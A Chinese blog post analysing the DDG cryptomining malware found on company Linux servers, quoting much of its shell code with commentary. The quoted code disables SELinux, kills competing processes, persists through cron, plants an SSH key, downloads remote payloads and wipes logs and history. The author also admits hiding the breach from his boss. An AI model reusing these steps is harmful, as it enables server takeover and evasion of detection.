公司有幾臺機器，最近cpu一直在瘋轉(zhuǎn)，就像是吃了藥，一直在發(fā)熱。由于機器實在是太多，有這么幾臺安全性防護沒有到位，就一直躺在角落里瘋狂運轉(zhuǎn)。

直到統(tǒng)一的監(jiān)控腳本接管了這幾臺機器，異常情況才得以浮出水面。最后發(fā)現(xiàn)了多個奇奇怪怪的進程，發(fā)現(xiàn)是一個挖礦腳本。下載下來學(xué)習(xí)了一下，發(fā)現(xiàn)腳本的編寫者，有著較高的水平。雖然在別人機器進行挖礦行為是不道德的，但掩蓋不了腳本編寫者的風(fēng)騷操作。

挖礦，是計算機技術(shù)界最讓人迷惑的行為之一，但它賺錢。據(jù)悉，這段腳本名叫DDG，已經(jīng)挖取了價值一千多萬人民幣的虛擬幣貨幣。

本著學(xué)習(xí)的目的，我稍微分析了一下這個神奇的腳本，也算是吸盡它的精華，為我所用。這事我都沒敢告訴老板，因為說了他也不懂，反生事端。不過和大家交流一下還是可以的，因為你們懂啊。

code 1

#!/bin/sh

腳本的第一行，看起來是一行注釋，但其實并不是。它規(guī)定了接下來的腳本，將要采用哪一個SHELL執(zhí)行。像我們平常用的bash、zsh等，屬于sh的超集，這個腳本使用sh作為執(zhí)行的shell，具有更好的可移植性。

code 2

setenforce 0 2>dev/nullecho SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null

setenforce是Linux的selinux防火墻配置命令，執(zhí)行setenforce 0表示關(guān)閉selinux防火墻。2代表的是標準錯誤（stderr）的意思。所以后面，使用重定向符，將命令的錯誤輸出定向到/dev/null設(shè)備中。這個設(shè)備是一個虛擬設(shè)備，意思是什么都不干。非常適合靜悄悄的干壞事。

code 3

sync && echo 3 >/proc/sys/vm/drop_caches

腳本貼心的幫我們釋放了一些內(nèi)存資源，以便獲取更多的資源進行挖礦。

眾所周知，Linux系統(tǒng)會隨著長時間的運行，會產(chǎn)生很多緩存，清理方式就是寫一個數(shù)字到drop_caches文件里，這個數(shù)字通常為3。sync命令將所有未寫的系統(tǒng)緩沖區(qū)寫到磁盤中，執(zhí)行之后就可以放心的釋放緩存了。

code 4

crondir='/var/spool/cron/'"$USER"

cont=`cat ${crondir}`

ssht=`cat /root/.ssh/authorized_keys`

echo 1 > /etc/sysupdates

rtdir="/etc/sysupdates"

bbdir="/usr/bin/curl"

bbdira="/usr/bin/cur"

ccdir="/usr/bin/wget"

ccdira="/usr/bin/wge"

mv /usr/bin/wget /usr/bin/get

mv /usr/bin/xget /usr/bin/get

mv /usr/bin/get /usr/bin/wge

mv /usr/bin/curl /usr/bin/url

mv /usr/bin/xurl /usr/bin/url

mv /usr/bin/url /usr/bin/cur

沒錯，上面這些語句就是完成了一些普通的操作。值得注意的是，它把我們的一些常用命令，使用mv命令給重名了。這在執(zhí)行命令的時候，就會顯得分成功能的蛋疼。這腳本已經(jīng)更改了計算機的一些文件，屬于犯罪的范疇了。

腳本為了復(fù)用一些功能，抽象出了很多的函數(shù)。我們直接跳到main函數(shù)的執(zhí)行，然后看一下這個過程。

code 5

首先是kill_miner_proc函數(shù)。代碼很長，就不全部貼出來了。

kill_miner_proc()

{

? ? ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9

? ...

? ? pkill -f biosetjenkins

? ? pkill -f Loopback

? ? ...

? ? crontab -r

? ? rm -rf /var/spool/cron/*

挖礦領(lǐng)域是一個相愛相殺的領(lǐng)域。這個方法首先使用ps、grep、kill一套組合，干掉了同行的挖礦腳本，然后停掉了同行的cron腳本，黑吃黑的感覺。

在這段腳本里，使用了pkill命令。這個命令會終止進程，并按終端號踢出用戶，比較暴力。

code 6

接下來執(zhí)行的是kill_sus_proc函數(shù)。

ps axf -o "pid"|while read procid

do

...

done

ps加上o參數(shù)，可以指定要輸出的列，在這里只輸出的進程的pid，然后使用read函數(shù)，對procid進行遍歷操作。

code 7

ls -l /proc/$procid/exe | grep /tmp

if [ $? -ne 1 ]

then

...

fi

上面就是遍歷操作過程了，我們可以看到if語句的語法。其中$?指的是上一個命令的退出狀態(tài)。0表示沒有錯誤，其他任何值表明有錯誤。-ne是不等于的意思，意思就是能夠匹配到tmp這個字符串。

code 8

ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid

do

...

done

呵呵，上面又來了一次循環(huán)遍歷。不過這次針對的目標，是cpu使用超過40%的進程。讀過xjjdog對awk分析的同學(xué)，對這個命令應(yīng)該非常的熟悉。這就有點狠了：影響我挖礦的進程，都得死！

相煎何太急。

code 9

再接下來，腳本針對不同的用戶屬性，進行了不同的操作。

首先是root用戶。通過判斷是否存在$rtdir文件，來確定是否是root權(quán)限。

chattr -i /etc/sysupdate*

chattr -i /etc/config.json*

chattr -i /etc/update.sh*

chattr -i /root/.ssh/authorized_keys*

chattr -i /etc/networkservice

使用chattr命令，把一些重要的文件，搞成不能任意改動的只讀屬性，也是夠損的。然后，操作cron程序，把腳本的更新服務(wù)加入到定時中。

就是下面這段腳本。

code 10

if [ ! -f "/usr/bin/crontab" ]

then

? ? echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1" >> ${crondir}

else

? ? [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab -

fi

注意[[ $cont =~ "update.sh" ]]這以小段代碼，怪異的很。[[ ]]是shell中內(nèi)置的一個命令，支持字符串的模式匹配。使用=~的時候，甚至支持shell的正則表達式，強大的令人發(fā)指。它的輸出結(jié)果是一個bool類型，所以能夠使用||進行拼接。

而后面的單小括號()，是的是一個命令組，括號中多個命令之間用分號隔開，最后一個命令可以沒有分號；和`cmd`的效果基本是一樣的。

code 11

搞完了定時任務(wù)，就要配置ssh自動登錄了，通過把公鑰追加到信任列表中就可以。

chmod 700 /root/.ssh/

echo >> /root/.ssh/authorized_keys

chmod 600 root/.ssh/authorized_keys

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/?

code 12

說曹操曹操就到，下面的腳本就使用了``進行操作。

filesize_config=`ls -l /etc/config.json | awk '{ print $5 }'`

if [ "$filesize_config" -ne "$config_size" ]

then

? ? pkill -f sysupdate

? ? rm /etc/config.json

? ? downloads $config_url /etc/config.json $config_url_backup

else

? ? echo "no need download"

fi

通過一系列騷操作，獲取到配置文件的大小，如果判斷文件大小不一致，那么就重新下載一個。這就用到了downloads函數(shù)。

shell中的函數(shù)，看起來比較怪異，后面的參數(shù)傳遞，就像是腳本傳遞一樣，傳送給函數(shù)。

code 13

downloads $config_url /etc/config.json $config_url_backup

這句話，就傳遞了三個參數(shù)。

當然，文件要從遙遠的服務(wù)器上下載。域名是.de結(jié)尾的，證明是個德國的域名，其他的我們一無所知。

downloads()

{

? ? if [ -f "/usr/bin/curl" ]

? ? then

? ? echo $1,$2

? ? ? ? http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1`

? ? ? ? if [ "$http_code" -eq "200" ]

? ? ? ? then

? ? ? ? ? ? curl --connect-timeout 10 --retry 100 $1 > $2

? ? ? ? elif [ "$http_code" -eq "405" ]

? ? ? ? then

? ? ? ? ? ? curl --connect-timeout 10 --retry 100 $1 > $2

? ? ? ? else

? ? ? ? ? ? curl --connect-timeout 10 --retry 100 $3 > $2

? ? ? ? fi

? ? elif [ -f "/usr/bin/cur" ]

? ? then

? ? ? ? http_code = `cur -I -m 10 -o /dev/null -s -w %{http_code} $1`

? ? ? ? if [ "$http_code" -eq "200" ]

? ? ? ? then

? ? ? ? ? ? cur --connect-timeout 10 --retry 100 $1 > $2

? ? ? ? elif [ "$http_code" -eq "405" ]

? ? ? ? then

? ? ? ? ? ? cur --connect-timeout 10 --retry 100 $1 > $2

? ? ? ? else

? ? ? ? ? ? cur --connect-timeout 10 --retry 100 $3 > $2

fi

? ? elif [ -f "/usr/bin/wget" ]

? ? then

? ? ? ? wget --timeout=10 --tries=100 -O $2 $1

? ? ? ? if [ $? -ne 0 ]

? ? then

? ? ? ? wget --timeout=10 --tries=100 -O $2 $3

? ? ? ? fi

? ? elif [ -f "/usr/bin/wge" ]

? ? then

? ? ? ? wge --timeout=10 --tries=100 -O $2 $1

? ? ? ? if [ $? -eq 0 ]

? ? ? ? then

? ? ? ? ? ? wge --timeout=10 --tries=100 -O $2 $3

? ? ? ? fi

? ? fi

}

我認為，這段代碼作者寫的又臭又長，完全沒有體現(xiàn)出自己應(yīng)有的水平。應(yīng)該是趕工期，沒有想好代碼的復(fù)用，才會寫的這么有失水準。

我們上面說到，腳本改了幾個命令的名字，其中就有curl。這個命令是如此的強大，以至于腳本的作者都忍不住加了不少參數(shù)。

-I是用來測試http頭信息

-m設(shè)置最大傳輸時間

-o指定保持的文件名。這里是/dev/null，呃呃呃

-s靜默模式。不輸出任何東西

--connect-timeout連接超時時間

--retry重試次數(shù)，好狠100次

如果沒有curl？那就使用替補的wget，套路都是一樣的。

code 14

接下來是一系列相似的操作，最后，對iptables一批操作。

iptables -F

iptables -X

iptables -A OUTPUT -p tcp --dport 3333 -j DROP

iptables -A OUTPUT -p tcp --dport 5555 -j DROP

iptables -A OUTPUT -p tcp --dport 7777 -j DROP

iptables -A OUTPUT -p tcp --dport 9999 -j DROP

iptables -I INPUT -s 43.245.222.57 -j DROP

service iptables reload

code 15

細心的腳本編寫者，還使用命令清理了操作日志。

history -c

echo > /var/spool/mail/root

echo > /var/log/wtmp

echo > /var/log/secure

echo > /root/.bash_history

不露死角，瀟灑走開。

可以看到，且不說真正的挖礦程序，僅僅是這個小腳本，作者也下足了功夫。腳本里命令繁多，使用方式多樣，縮緊格式優(yōu)雅，除了有一點啰嗦，沒有加密之外，是一個非常好的拿來學(xué)習(xí)的腳本。

瞧了瞧被控制的機器，我趕緊偷偷的重裝了機器。

就當它是一個夢吧。老板問起的時候，什么都沒有發(fā)生過。